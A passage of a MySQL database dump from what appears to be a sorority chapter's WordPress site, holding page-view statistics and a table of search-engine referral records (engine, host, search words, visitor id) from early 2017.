o/','2018-08-12',1,772),('/service/youth/','2018-08-12',1,738),('/service/zen/','2018-08-12',1,786),('/ts_teams/yasmine-allen/','2018-08-12',1,1228),('/webmaster','2018-08-13',1,657),('/webmaster/','2018-08-13',1,657),('/?wc-ajax=get_refreshed_fragments','2018-08-13',1,6);
/*!40000 ALTER TABLE `lwz_statistics_pages` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_statistics_search`
--

DROP TABLE IF EXISTS `lwz_statistics_search`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_statistics_search` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `last_counter` date NOT NULL,
  `engine` varchar(64) NOT NULL,
  `host` varchar(255) DEFAULT NULL,
  `words` varchar(255) DEFAULT NULL,
  `visitor` bigint(20) DEFAULT NULL,
  PRIMARY KEY (`ID`),
  KEY `last_counter` (`last_counter`),
  KEY `engine` (`engine`),
  KEY `host` (`host`)
) ENGINE=MyISAM AUTO_INCREMENT=2405 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_statistics_search`
--

LOCK TABLES `lwz_statistics_search` WRITE;
/*!40000 ALTER TABLE `lwz_statistics_search` DISABLE KEYS */;
INSERT INTO `lwz_statistics_search` VALUES (1,'2017-02-03','google','www.google.com','',22),(2,'2017-02-03','google','www.google.com','',30),(3,'2017-02-04','google','www.google.com','',40),(4,'2017-02-04','bing','www.bing.com','',43),(5,'2017-02-04','google','www.google.com','',44),(6,'2017-02-04','google','www.google.com','',45),(7,'2017-02-04','yahoo','search.yahoo.com','',48),(8,'2017-02-04','google','com.google.android.googlequicksearchbox','',53),(9,'2017-02-05','google','www.google.com','',58),(10,'2017-02-05','google','www.google.com','',60),(11,'2017-02-05','google','www.google.com','',65),(12,'2017-02-05','google','www.google.com','',68),(13,'2017-02-05','google','www.google.com','',69),(14,'2017-02-06','google','www.google.com','',79),(15,'2017-02-06','google','www.google.com','',82),(16,'2017-02-06','google','www.google.com','',93),(17,'2017-02-07','google','www.google.com','',133),(18,'2017-02-07','google','www.google.com','',135),(19,'2017-02-07','google','www.google.com','',137),(20,'2017-02-08','google','www.google.com','',157),(21,'2017-02-08','google','google.com','',162),(22,'2017-02-08','bing','www.bing.com','',167),(23,'2017-02-09','google','www.google.com','',170),(24,'2017-02-09','google','www.google.com','',175),(25,'2017-02-09','google','www.google.com','',177),(26,'2017-02-10','google','www.google.com','',186),(27,'2017-02-10','bing','www.bing.com','zeta phi beta sorority inc howard county md',190),(28,'2017-02-10','google','www.google.com','',195),(29,'2017-02-10','google','www.google.com','',198),(30,'2017-02-10','google','www.google.com','',201),(31,'2017-02-11','google','www.google.com','',220),(32,'2017-02-11','google','www.google.com','',224),(33,'2017-02-11','bing','www.bing.com','phi beta sigma chapter howard county',228),(34,'2017-02-11','google','www.google.com','',230),(35,'2017-02-12','google','www.google.com','',244),(36,'2017-02-12','google','www.google.com','',248),(37,'2017-02-12','google','www.google.com','',253),(38,'2017-02-12','google','www.google.com','',256),(39,'2017-02-12','bing','www.bing.com','',260),(40,'2017-02-13','google','www.google.com','',274),(41,'2017-02-13','google','www.google.com','',277),(42,'2017-02-13','google','www.google.com','',281),(43,'2017-02-13','google','www.google.com','',283),(44,'2017-02-13','google','www.google.com','',285),(45,'2017-02-13','google','www.google.com','',287),(46,'2017-02-14','google','www.google.com','',293),(47,'2017-02-14','google','www.google.com','',304),(48,'2017-02-14','google','www.google.com','',320),(49,'2017-02-14','google','www.google.com','',322),(50,'2017-02-14','google','www.google.com','',326),(51,'2017-02-14','google','www.google.com','',327),(52,'2017-02-15','google','www.google.com','',347),(53,'2017-02-15','google','www.google.com','',348),(54,'2017-02-15','google','www.google.com','',349),(55,'2017-02-15','google','www.google.com','',352),(56,'2017-02-16','google','www.google.com','',697),(57,'2017-02-16','google','www.google.com','',832),(58,'2017-02-16','google','www.google.com','',840),(59,'2017-02-16','google','www.google.com','',841),(60,'2017-02-17','google','www.google.com','',848),(61,'2017-02-17','google','www.google.com','',857),(62,'2017-02-17','google','www.google.com','',858),(63,'2017-02-17','google','www.google.com','',861),(64,'2017-02-17','google','www.google.com','',862),(65,'2017-02-17','google','www.google.com','',867),(66,'2017-02-18','google','www.google.com','',941),(67,'2017-02-18','google','www.google.com','',946),(68,'2017-02-18','google','www.google.com','',953),(69,'2017-02-19','google','www.google.com','',967),(70,'2017-02-19','google','www.google.com','',969),(71,'2017-02-19','google','www.google.com','',978),(72,'2017-02-20','google','www.google.com','',989),(73,'2017-02-20','google','www.google.com','',990),(74,'2017-02-20','google','www.google.com','',1000),(75,'2017-02-20','google','www.google.com','',1008),(76,'2017-02-20','google','www.google.com','',1013),(77,'2017-02-20','google','www.google.com','',1017),(78,'2017-02-21','google','www.google.com','',1050),(79,'2017-02-21','google','www.google.com','',1054),(80,'2017-02-21','google','www.google.com','',1060),(81,'2017-02-21','google','www.google.com','',1076),(82,'2017-02-22','google','www.google.com','',1085),(83,'2017-02-22','google','www.google.com','',1090),(84,'2017-02-22','google','www.google.com','',1094),(85,'2017-02-22','google','www.google.com','',1097),(86,'2017-02-22','google','www.google.com','',1101),(87,'2017-02-22','google','com.google.android.googlequicksearchbox','',1105),(88,'2017-02-23','yahoo','search.yahoo.com','',1106),(89,'2017-02-23','google','www.google.com','',1119),(90,'2017-02-23','google','www.google.com','',1121),(91,'2017-02-23','google','com.google.android.googlequicksearchbox','',1125),(92,'2017-02-23','google','com.google.android.googlequicksearchbox','',1134),(93,'2017-02-23','google','www.google.com','',1136),(94,'2017-02-23','google','www.google.com','',1139),(95,'2017-02-23','baidu','www.baidu.com','Home-LambdaGammaZeta:LambdaGammaZeta',1141),(96,'2017-02-23','baidu','m.baidu.com','Home-LambdaGammaZeta:LambdaGammaZeta',1142),(97,'2017-02-24','google','www.google.com','',1157),(98,'2017-02-24','google','www.google.com','',1159),(99,'2017-02-24','google','www.google.com','',1160),(100,'2017-02-24','google','www.google.com','',1161),(101,'2017-02-24','google','www.google.com','',1163),(102,'2017-02-24','google','www.google.com','',1170),(103,'2017-02-24','google','com.google.android.googlequicksearchbox','',1173),(104,'2017-02-24','google','www.google.com','',1187),(105,'2017-02-24','google','www.google.com','',1189),(106,'2017-02-25','google','www.google.com','',1193),(107,'2017-02-25','google','www.google.com','',1194),(108,'2017-02-25','google','www.google.com','',1200),(109,'2017-02-25','yahoo','ca.search.yahoo.com','',1205),(110,'2017-02-25','bing','www.bing.com','zeta phi beta howard county',1210),(111,'2017-02-25','google','www.google.com','',1213),(112,'2017-02-25','google','www.google.com','',1226),(113,'2017-02-25','google','www.google.com','',1233),(114,'2017-02-25','google','www.google.com','',1239),(115,'2017-02-25','google','www.google.com','',1240),(116,'2017-02-26','yahoo','r.search.yahoo.com','',1251),(117,'2017-02-26','google','www.google.com','',1338),(118,'2017-02-26','google','www.google.com','',1339),(119,'2017-02-26','google','www.google.com','',1344),(120,'2017-02-26','google','www.google.com','',1350),(121,'2017-02-27','google','www.google.com','',1351),(122,'2017-02-27','google','www.google.com','',1354),(123,'2017-02-27','google','www.google.com','',1355),(124,'2017-02-27','yahoo','search.yahoo.com','',1359),(125,'2017-02-27','google','www.google.com','',1370),(126,'2017-02-27','google','www.google.com','',1377),(127,'2017-02-27','google','www.google.com','',1382),(128,'2017-02-27','google','www.google.com','',1396),(129,'2017-02-27','bing','www.bing.com','',1401),(130,'2017-02-28','google','www.google.com','',1417),(131,'2017-02-28','google','www.google.com','zeta phi beta columbia, md chapter',1418),(132,'2017-02-28','google','www.google.com','',1424),(133,'2017-02-28','google','www.google.com','',1429),(134,'2017-02-28','yahoo','r.search.yahoo.com','',1431),(135,'2017-02-28','google','www.google.com','',1432),(136,'2017-02-28','google','www.google.com','',1434),(137,'2017-03-01','google','www.google.com','',1441),(138,'2017-03-01','google','www.google.com','',1443),(139,'2017-03-01','google','com.google.android.gm','',1446),(140,'2017-03-01','google','www.google.com','',1462),(141,'2017-03-01','google','www.google.com','',1463),(142,'2017-03-01','google','www.google.com','',1465),(143,'2017-03-01','google','www.google.com','',1466),(144,'2017-03-02','google','www.google.com','',1498),(145,'2017-03-02','google','www.google.com','',1504),(146,'2017-03-02','google','www.google.com','',1508),(147,'2017-03-02','google','com.google.android.googlequicksearchbox','',1510),(148,'2017-03-02','google','www.google.com','',1514),(149,'2017-03-03','google','www.google.com','',1534),(150,'2017-03-03','google','www.google.com','',1538),(151,'2017-03-03','google','www.google.com','',1539),(152,'2017-03-03','google','www.google.com','',1541),(153,'2017-03-03','google','www.google.com','',1542),(154,'2017-03-04','yahoo','r.search.yahoo.com','',1549),(155,'2017-03-04','google','www.google.com','',1550),(156,'2017-03-04','bing','www.bing.com','',1557),(157,'2017-03-04','google','www.google.com','',1566),(158,'2017-03-04','google','www.google.com','',1567),(159,'2017-03-04','google','www.google.com','',1568),(160,'2017-03-04','google','www.google.com','',1570),(161,'2017-03-04','bing','www.bing.com','',1573),(162,'2017-03-04','yandex','yandex.ru','',1580),(163,'2017-03-04','google','www.google.com','',1583),(164,'2017-03-05','google','www.google.com','',1590),(165,'2017-03-05','google','www.google.com','',1592),(166,'2017-03-05','google','www.google.com','',1598),(167,'2017-03-05','google','www.google.com','',1599),(168,'2017-03-05','google','www.google.com','',1604),(169,'2017-03-05','google','www.google.com','',1606),(170,'2017-03-05','google','www.google.com','',1609),(171,'2017-03-05','google','www.google.com','',1618),(172,'2017-03-06','google','www.google.com','',1627),(173,'2017-03-06','google','www.google.com','',1635),(174,'2017-03-06','google','www.google.com','',1637),(175,'2017-03-06','google','www.google.com','',1638),(176,'2017-03-06','google','www.google.com','',1639),(177,'2017-03-06','google','www.google.com','',1642),(178,'2017-03-06','google','www.google.com','',1644),(179,'2017-03-06','google','com.google.android.googlequicksearchbox','',1653),(180,'2017-03-06','google','www.google.com','',1654),(181,'2017-03-06','google','com.google.android.googlequicksearchbox','',1657),(182,'2017-03-07','google','www.google.com','',1677),(183,'2017-03-07','google','www.google.com','',1678),(184,'2017-03-07','google','www.google.com','',1683),(185,'2017-03-07','google','www.google.com','',1685),(186,'2017-03-07','google','www.google.com','',1688),(187,'2017-03-08','google','www.google.com','',1693),(188,'2017-03-08','google','google.com','',1704),(189,'2017-03-08','google','www.google.com','',1715),(190,'2017-03-08','google','www.google.com','',1716),(191,'2017-03-08','google','www.google.com','',1719),(192,'2017-03-08','google','www.google.com','',1722),(193,'2017-03-08','google','www.google.com','',1724),(194,'2017-03-09','google','www.google.com','',1744),(195,'2017-03-09','google','www.google.com','',1749),(196,'2017-03-09','google','www.google.com','',1755),(197,'2017-03-10','google','www.google.com','',1758),(198,'2017-03-10','google','www.google.com','',1768),(199,'2017-03-10','google','www.google.com','',1769),(200,'2017-03-10','google','www.google.com','',1773),(201,'2017-03-10','google','www.google.com','',1777),(202,'2017-03-10','yahoo','r.search.yahoo.com','',1779),(203,'2017-03-10','google','www.google.com','',1780),(204,'2017-03-10','google','www.google.com','',1782),(205,'2017-03-11','google','www.google.com','',1793),(206,'2017-03-11','google','www.google.com','',1799),(207,'2017-03-11','google','www.google.com','',1811),(208,'2017-03-11','google','www.google.com','',1819),(209,'2017-03-12','google','www.google.com','',1820),(210,'2017-03-12','google','www.google.at','',1826),(211,'2017-03-12','google','com.google.android.googlequicksearchbox','',1828),(212,'2017-03-12','google','www.google.com','',1837),(213,'2017-03-12','google','www.google.com','',1845),(214,'2017-03-13','google','www.google.com','',1864),(215,'2017-03-13','google','www.google.com','',1867),(216,'2017-03-13','google','www.google.com','',1873),(217,'2017-03-14','google','www.google.com','',1909),(218,'2017-03-14','google','www.google.com','',1914),(219,'2017-03-14','google','www.google.com','',1916),(220,'2017-03-14','google','www.google.com','',1921),(221,'2017-03-14','google','www.google.com','',1924),(222,'2017-03-15','google','www.google.com','',1939),(223,'2017-03-15','google','www.google.com','',1940),(224,'2017-03-15','yahoo','r.search.yahoo.com','',1945),(225,'2017-03-15','google','www.google.com','',1946),(226,'2017-03-15','google','www.google.com','',1948),(227,'2017-03-15','google','www.google.com','',1954),(228,'2017-03-15','google','www.google.com','',1955),(229,'2017-03-16','google','www.google.com','',1967),(230,'2017-03-16','google','www.google.com','',1968),(231,'2017-03-16','google','www.google.com','',1970),(232,'2017-03-16','google','www.google.com','',1972),(233,'2017-03-16','google','www.google.com','',1974),(234,'2017-03-16','baidu','m.baidu.com','Home-ZetaPhiBetaSororityInc.,LambdaGammaZetaChapter',1981),(235,'2017-03-16','baidu','www.baidu.com','Home-ZetaPhiBetaSororityInc.,LambdaGammaZetaChapter',1982),(236,'2017-03-16','google','www.google.com','',1983),(237,'2017-03-16','google','www.google.com','',1986),(238,'2017-03-17','google','www.google.com','',1990),(239,'2017-03-17','bing','www.bing.com','',1999),(240,'2017-03-17','google','www.google.com','',2002),(241,'2017-03-17','google','www.google.com','',2012),(242,'2017-03-18','google','www.google.com','',2013),(243,'2017-03-18','google','www.google.com','',2020),(244,'2017-03-18','google','www.google.com','',2022),(245,'2017-03-18','google','www.google.com','',2023),(246,'2017-03-18','google','www.google.com','',2025),(247,'2017-03-18','google','www.google.com','',2028),(248,'2017-03-18','yahoo','search.yahoo.com','',2029),(249,'2017-03-18','google','www.google.com','',2033),(250,'2017-03-18','google','www.google.com','',2042),(251,'2017-03-19','google','www.google.com','',2061),(252,'2017-03-19','google','www.google.com','',2062),(253,'2017-03-19','google','www.google.com','',2069),(254,'2017-03-19','google','www.google.com','',2090),(255,'2017-03-19','bing','www.bing.com','',2096),(256,'2017-03-20','google','www.google.com','',2100),(257,'2017-03-20','google','www.google.com','',2118),(258,'2017-03-20','google','www.google.com','',2125),(259,'2017-03-20','google','www.google.com','',2127),(260,'2017-03-20','google','www.google.com','',2129),(261,'2017-03-20','google','www.google.com','',2130),(262,'2017-03-20','google','www.google.com','',2136),(263,'2017-03-21','google','www.google.com','',2174),(264,'2017-03-21','google','www.google.com','',2175),(265,'2017-03-21','google','www.google.com','',2176),(266,'2017-03-22','bing','www.bing.com','beta gamma lambda',2214),(267,'2017-03-22','google','www.google.com','',2219),(268,'2017-03-22','google','www.google.com','',2228),(269,'2017-03-22','bing','www.bing.com','www.zphiblgz.org/scholarships',2234),(270,'2017-03-22','google','www.google.com','',2236),(271,'2017-03-22','google','www.google.com','',2237),(272,'2017-03-22','google','www.google.com','',2238),(273,'2017-03-22','google','www.google.com','cassandra dorsey',2239),(274,'2017-03-22','google','www.google.com','',2241),(275,'2017-03-23','google','www.google.com','',2256),(276,'2017-03-23','google','www.google.com','',2260),(277,'2017-03-23','google','www.google.com','',2261),(278,'2017-03-23','google','www.google.com','',2270),(279,'2017-03-23','google','www.google.com','',2276),(280,'2017-03-23','yahoo','search.yahoo.com','',2277),(281,'2017-03-23','google','www.google.com','',2278),(282,'2017-03-23','google','www.google.com','',2279),(283,'2017-03-23','bing','www.bing.com','',2282),(284,'2017-03-24','google','www.google.com','',2300),(285,'2017-03-24','bing','www.bing.com','Lambda tau chapter of zeta phi beta',2303),(286,'2017-03-24','google','www.google.com','',2304),(287,'2017-03-24','google','www.google.com','',2308),(288,'2017-03-24','google','www.google.com','',2312),(289,'2017-03-24','google','www.google.com','',2317),(290,'2017-03-24','google','www.google.com','',2322),(291,'2017-03-24','google','www.google.com','',2334),(292,'2017-03-24','google','www.google.com','',2340),(293,'2017-03-25','google','www.google.com','',2353),(294,'2017-03-25','google','www.google.com','',2360),(295,'2017-03-25','google','www.google.com','',2366),(296,'2017-03-25','google','www.google.com','',2368),(297,'2017-03-25','google','www.google.com','',2375),(298,'2017-03-25','google','www.google.com','',2377),(299,'2017-03-26','google','www.google.com','',2392),(300,'2017-03-26','yahoo','r.search.yahoo.com','',2395),(301,'2017-03-26','google','www.google.com','',2405),(302,'2017-03-26','google','www.google.com','',2409),(303,'2017-03-26','google','www.google.com','',2414),(304,'2017-03-26','google','www.google.com','',2415),(305,'2017-03-26','google','www.google.com','',2417),(306,'2017-03-26','bing','www.bing.com','',2420),(307,'2017-03-27','google','www.google.com','',2442),(308,'2017-03-27','google','google.com','',2443),(309,'2017-03-27','google','www.google.com','',2446),(310,'2017-03-27','google','www.google.com','',2455),(311,'2017-03-27','google','www.google.com','',2458),(312,'2017-03-27','google','www.google.com','',2460),(313,'2017-03-27','google','www.google.com','',2464),(314,'2017-03-28','google','www.google.com','',2479),(315,'2017-03-28','google','www.google.com','',2487),(316,'2017-03-28','google','www.google.com','',2498),(317,'2017-03-28','baidu','m.baidu.com','Home-ZetaPhiBetaSororityInc.,LambdaGammaZetaChapter',2500),(318,'2017-03-28','google','www.google.com','',2510),(319,'2017-03-28','baidu','www.baidu.com','Home-ZetaPhiBetaSororityInc.,LambdaGammaZetaChapter',2514),(320,'2017-03-29','google','www.google.com','',2522),(321,'2017-03-29','google','www.google.com','',2526),(322,'2017-03-29','google','www.google.com','',2527),(323,'2017-03-29','google','www.google.com','',2529),(324,'2017-03-29','google','www.google.com','',2535),(325,'2017-03-29','google','www.google.com','',2538),(326,'2017-03-29','google','www.google.com','',2540),(327,'2017-03-29','google','www.google.com','',2545),(328,'2017-03-29','google','www.google.com','',2554),(329,'2017-03-29','google','www.google.com','',2559),(330,'2017-03-30','google','www.google.co.jp','',2570),(331,'2017-03-30','google','com.google.android.gm','',2574),(332,'2017-03-30','google','www.google.com','',2577),(333,'2017-03-30','google','www.google.com','',2580),(334,'2017-03-30','google','www.google.com','',2582),(335,'2017-03-30','yahoo','search.yahoo.com','',2588),(336,'2017-03-30','google','www.google.com','',2589),(337,'2017-03-30','google','com.google.android.gm','',2592),(338,'2017-03-30','google','www.google.com','',2593),(339,'2017-03-30','google','www.google.com','',2594),(340,'2017-03-30','google','www.google.com','',2605),(341,'2017-03-30','bing','www.bing.com','',2606),(342,'2017-03-30','google','www.google.com','',2609),(343,'2017-03-30','yahoo','search.yahoo.com','',2611),(344,'2017-03-30','google','www.google.com','',2615),(345,'2017-03-31','bing','www.bing.com','zeta phi beta sorority inc lambda chapter',2632),(346,'2017-03-31','google','www.google.com','',2638),(347,'2017-03-31','google','www.google.com','',2642),(348,'2017-03-31','google','www.google.com','',2644),(349,'2017-03-31','google','www.google.com','',2648),(350,'2017-03-31','google','www.google.com','',2652),(351,'2017-03-31','google','www.google.com','',2654),(352,'2017-04-01','google','www.google.com','',2679),(353,'2017-04-01','google','www.google.com','',2684),(354,'2017-04-02','google','www.google.com','',2723),(355,'2017-04-02','google','www.google.com','',2731),(356,'2017-04-02','google','www.google.com','',2733),(357,'2017-04-03','google','www.google.com','',2758),(358,'2017-04-03','google','www.google.com','',2761),(359,'2017-04-03','google','com.google.android.googlequicksearchbox','',2766),(360,'2017-04-03','google','www.google.com','',2775),(361,'2017-04-04','google','www.google.com','',2782),(362,'2017-04-04','google','www.google.com','',2785),(363,'2017-04-04','google','www.google.com','',2786),(364,'2017-04-04','google','www.google.com','',2789),(365,'2017-04-04','google','www.google.com','',2791),(366,'2017-04-04','yahoo','r.search.yahoo.com','',2807),(367,'2017-04-04','google','www.google.com','',2808),(368,'2017-04-05','google','www.google.com','',2828),(369,'2017-04-05','google','www.google.com','',2832),(370,'2017-04-05','bing','www.bing.com','',2833),(371,'2017-04-06','google','www.google.com','',2867),(372,'2017-04-07','google','www.google.com','',2895),(373,'2017-04-07','google','www.google.com','',2897),(374,'2017-04-07','yandex','yandex.ru','',2901),(375,'2017-04-07','google','www.google.com','',2902),(376,'2017-04-07','google','www.google.com','',2904),(377,'2017-04-07','google','www.google.com','',2905),(378,'2017-04-08','google','www.google.com','',2907),(379,'2017-04-08','google','www.google.com','',2926),(380,'2017-04-09','google','www.google.com','',2950),(381,'2017-04-09','google','www.google.com','',2960),(382,'2017-04-09','google','www.google.com','',2969),(383,'2017-04-09','google','www.google.com','',2973),(384,'2017-04-09','google','www.google.com','',2976),(385,'2017-04-10','yandex','yandex.ru','',2986),(386,'2017-04-10','google','www.google.com','',2997),(387,'2017-04-10','google','www.google.com','',3004),(388,'2017-04-10','google','www.google.com','',3013),(389,'2017-04-10','google','www.google.com','',3017),(390,'2017-04-11','google','www.google.com','',3038),(391,'2017-04-11','google','www.google.com','',3039),(392,'2017-04-11','google','www.google.com','',3044),(393,'2017-04-11','yandex','yandex.ru','',3053),(394,'2017-04-12','google','www.google.com','',3055),(395,'2017-04-12','google','www.google.com','',3060),(396,'2017-04-12','google','www.google.com','',3070),(397,'2017-04-12','google','www.google.com','',3076),(398,'2017-04-12','google','www.google.com','',3079),(399,'2017-04-12','google','www.google.com','',3097),(400,'2017-04-13','google','www.google.com','',3112),(401,'2017-04-13','yandex','yandex.ru','',3124),(402,'2017-04-13','google','www.google.com','',3126),(403,'2017-04-13','google','www.google.com','',3139),(404,'2017-04-14','google','www.google.com','',3153),(405,'2017-04-14','google','www.google.com','',3157),(406,'2017-04-15','google','www.google.com','',3174),(407,'2017-04-15','bing','www.bing.com','',3177),(408,'2017-04-15','google','www.google.com','',3181),(409,'2017-04-15','google','www.google.com','',3188),(410,'2017-04-15','google','www.google.com','',3192),(411,'2017-04-16','google','www.google.com','',3223),(412,'2017-04-17','google','com.google.android.googlequicksearchbox','',3234),(413,'2017-04-17','google','google.com','',3236),(414,'2017-04-17','google','www.google.com','',3250),(415,'2017-04-17','google','www.google.com','',3252),(416,'2017-04-17','bing','www.bing.com','',3261),(417,'2017-04-17','google','www.google.com','',3263),(418,'2017-04-18','google','www.google.com','',3268),(419,'2017-04-18','google','www.google.com','',3287),(420,'2017-04-18','google','www.google.com','',3290),(421,'2017-04-18','yahoo','r.search.yahoo.com','',3298),(422,'2017-04-18','google','www.google.com','',3301),(423,'2017-04-19','google','www.google.com','',3325),(424,'2017-04-19','google','www.google.com','',3334),(425,'2017-04-19','baidu','m.baidu.com','Home-ZetaPhiBetaSororityInc.,LambdaGammaZetaChapter',3336),(426,'2017-04-19','yahoo','search.yahoo.com','',3343),(427,'2017-04-20','bing','www.bing.com','gamma lambda zeta',3367),(428,'2017-04-20','google','www.google.com','',3373),(429,'2017-04-20','google','www.google.com','',3385),(430,'2017-04-21','yahoo','r.search.yahoo.com','',3410),(431,'2017-04-21','google','www.google.com','',3415),(432,'2017-04-21','google','www.google.com','',3421),(433,'2017-04-21','google','www.google.com','',3428),(434,'2017-04-22','google','www.google.com','',3443),(435,'2017-04-22','google','www.google.com','',3462),(436,'2017-04-22','google','www.google.com','',3467),(437,'2017-04-22','google','www.google.com','',3468),(438,'2017-04-23','google','www.google.com','',3500),(439,'2017-04-23','google','www.google.com','',3504),(440,'2017-04-23','google','www.google.com','',3525),(441,'2017-04-23','google','www.google.com','',3535),(442,'2017-04-23','bing','www.bing.com','',3538),(443,'2017-04-23','google','www.google.com','',3539),(444,'2017-04-24','google','www.google.com','',3540),(445,'2017-04-24','google','www.google.com','',3566),(446,'2017-04-24','google','www.google.com','',3579),(447,'2017-04-24','google','www.google.com','',3590),(448,'2017-04-25','google','www.google.com','',3597),(449,'2017-04-25','google','www.google.com','',3602),(450,'2017-04-25','bing','www.bing.com','member of zeta phi beta bio',3611),(451,'2017-04-25','google','www.google.com','',3613),(452,'2017-04-25','google','www.google.com','',3615),(453,'2017-04-26','google','www.google.com','',3661),(454,'2017-04-26','yandex','yandex.ru','',3663),(455,'2017-04-26','google','www.google.com','',3672),(456,'2017-04-26','google','www.google.com','',3674),(457,'2017-04-26','google','www.google.com','',3681),(458,'2017-04-26','google','www.google.com','',3684),(459,'2017-04-26','google','www.google.com','',3692),(460,'2017-04-26','google','www.google.com','',3695),(461,'2017-04-27','google','www.google.com','',3712),(462,'2017-04-27','google','www.google.com','',3717),(463,'2017-04-27','google','www.google.com','',3719),(464,'2017-04-28','google','www.google.com','',3738),(465,'2017-04-28','google','www.google.com','',3749),(466,'2017-04-28','bing','www.bing.com','www.zetaphibeta lambda zeta',3757),(467,'2017-04-29','google','www.google.com','',3765),(468,'2017-04-29','google','www.google.com','',3778),(469,'2017-04-29','google','www.google.com','',3785),(470,'2017-04-29','google','www.google.com','',3791),(471,'2017-04-29','google','www.google.com','',3793),(472,'2017-04-30','google','www.google.com','',3825),(473,'2017-04-30','google','www.google.com','',3829),(474,'2017-04-30','google','www.google.com','',3835),(475,'2017-04-30','google','www.google.com','',3839),(476,'2017-05-01','google','www.google.com','',3887),(477,'2017-05-01','google','www.google.com','',3918),(478,'2017-05-01','google','www.google.com','',3924),(479,'2017-05-02','google','www.google.com','',3941),(480,'2017-05-02','google','www.google.com','',3958),(481,'2017-05-02','google','www.google.com','',3978),(482,'2017-05-03','google','www.google.com','',4023),(483,'2017-05-03','google','www.google.com','',4033),(484,'2017-05-04','google','google.com','',4041),(485,'2017-05-04','google','www.google.com','',4051),(486,'2017-05-04','google','www.google.com','',4054),(487,'2017-05-04','google','www.google.com','',4060),(488,'2017-05-05','bing','www.bing.com','lambda gamma zeta',4086),(489,'2017-05-05','google','www.google.com','',4087),(490,'2017-05-05','google','www.google.com','',4096),(491,'2017-05-05','google','www.google.com','',4098),(492,'2017-05-06','google','www.google.com','',4149),(493,'2017-05-06','google','www.google.com','',4152),(494,'2017-05-06','google','www.google.com','',4160),(495,'2017-05-07','google','www.google.com','',4184),(496,'2017-05-07','google','www.google.com','',4186),(497,'2017-05-07','google','www.google.com','',4190),(498,'2017-05-07','google','google.com','',4196),(499,'2017-05-08','google','www.google.com','',4201),(500,'2017-05-08','google','www.google.com','',4209),(501,'2017-05-08','google','www.google.com','',4214),(502,'2017-05-08','google','www.google.com','',4218),(503,'2017-05-09','google','www.google.com','',4256),(504,'2017-05-10','google','www.google.com','',4281),(505,'2017-05-10','google','www.google.com','',4300),(506,'2017-05-10','google','www.google.com','',4308),(507,'2017-05-11','google','www.google.com','',4332),(508,'2017-05-11','google','www.google.com','',4335),(509,'2017-05-11','google','www.google.com','',4337),(510,'2017-05-11','bing','www.bing.com','2017 ZETA PHI BETA SORORITY, INC MARCH OF DIMES',4338),(511,'2017-05-11','google','www.google.com','',4339),(512,'2017-05-11','google','www.google.com','',4341),(513,'2017-05-11','google','www.google.com','',4346),(514,'2017-05-11','google','www.google.com','',4351),(515,'2017-05-12','google','www.google.com','',4363),(516,'2017-05-12','bing','www.bing.com','zeta phi beta sorority scholarship latricia marie barnes',4374),(517,'2017-05-12','google','www.google.com','',4379),(518,'2017-05-13','google','www.google.com','',4389),(519,'2017-05-13','google','www.google.com','',4407),(520,'2017-05-13','google','www.google.com','',4419),(521,'2017-05-14','google','www.google.com','',4463),(522,'2017-05-14','google','www.google.com','',4477),(523,'2017-05-15','google','www.google.com','',4488),(524,'2017-05-15','google','www.google.com','',4491),(525,'2017-05-15','google','www.google.com','',4493),(526,'2017-05-15','bing','www.bing.com','',4504),(527,'2017-05-16','google','www.google.com','',4520),(528,'2017-05-16','google','www.google.com','',4526),(529,'2017-05-16','google','www.google.com','',4530),(530,'2017-05-17','bing','www.bing.com','',4542),(531,'2017-05-17','google','www.google.com','',4549),(532,'2017-05-17','google','www.google.com','',4550),(533,'2017-05-17','google','www.google.com','',4551),(534,'2017-05-17','google','www.google.com','',4554),(535,'2017-05-17','google','www.google.com','',4559),(536,'2017-05-17','google','www.google.com','',4564),(537,'2017-05-18','google','www.google.com','',4587),(538,'2017-05-18','google','www.google.com','',4592),(539,'2017-05-19','google','www.google.com','',4605),(540,'2017-05-19','google','www.google.com','',4608),(541,'2017-05-19','google','www.google.com','',4609),(542,'2017-05-19','google','www.google.com','',4612),(543,'2017-05-19','google','www.google.com','',4616),(544,'2017-05-19','google','www.google.com.gh','',4622),(545,'2017-05-19','google','www.google.com','',4626),(546,'2017-05-20','yahoo','search.yahoo.com','',4636),(547,'2017-05-20','google','www.google.com','',4642),(548,'2017-05-20','bing','www.bing.com','',4643),(549,'2017-05-20','google','www.google.com','',4648),(550,'2017-05-20','google','www.google.com','',4649),(551,'2017-05-20','google','www.google.com','',4658),(552,'2017-05-21','bing','www.bing.com','',4670),(553,'2017-05-21','google','www.google.com','',4671),(554,'2017-05-21','google','www.google.com','',4674),(555,'2017-05-21','google','www.google.com','',4678),(556,'2017-05-22','google','www.google.com','',4729),(557,'2017-05-22','google','www.google.com','',4732),(558,'2017-05-22','google','www.google.com','',4738),(559,'2017-05-22','google','google.com','',4742),(560,'2017-05-22','google','www.google.com','',4745),(561,'2017-05-23','google','www.google.com','',4764),(562,'2017-05-23','google','www.google.com','',4767),(563,'2017-05-23','google','www.google.com','',4779),(564,'2017-05-23','bing','www.bing.com','zeta phi beta youtube lambda zeta',4783),(565,'2017-05-24','google','www.google.com','',4958),(566,'2017-05-24','google','www.google.com','',4963),(567,'2017-05-24','google','www.google.com','',4967),(568,'2017-05-24','google','www.google.com','',4988),(569,'2017-05-24','google','www.google.com','',5022),(570,'2017-05-25','google','www.google.com','',5103),(571,'2017-05-25','google','www.google.com','',5108),(572,'2017-05-25','google','www.google.com','',5111),(573,'2017-05-25','google','www.google.com','',5115),(574,'2017-05-25','google','www.google.com','',5116),(575,'2017-05-26','google','www.google.com','',5117),(576,'2017-05-26','google','www.google.com','',5131),(577,'2017-05-26','google','www.google.com','',5136),(578,'2017-05-27','google','www.google.com','',5150),(579,'2017-05-27','google','www.google.com','',5154),(580,'2017-05-28','google','www.google.com','',5165),(581,'2017-05-28','google','www.google.com','',5170),(582,'2017-05-28','google','www.google.com','',5172),(583,'2017-05-29','google','www.google.com','',5186),(584,'2017-05-29','google','google.com','',5195),(585,'2017-05-29','google','www.google.com','',5197),(586,'2017-05-30','google','www.google.com','',5235),(587,'2017-05-30','google','www.google.com','',5242),(588,'2017-05-31','google','www.google.com','',5267),(589,'2017-05-31','google','www.google.com','',5271),(590,'2017-05-31','google','www.google.com','',5274),(591,'2017-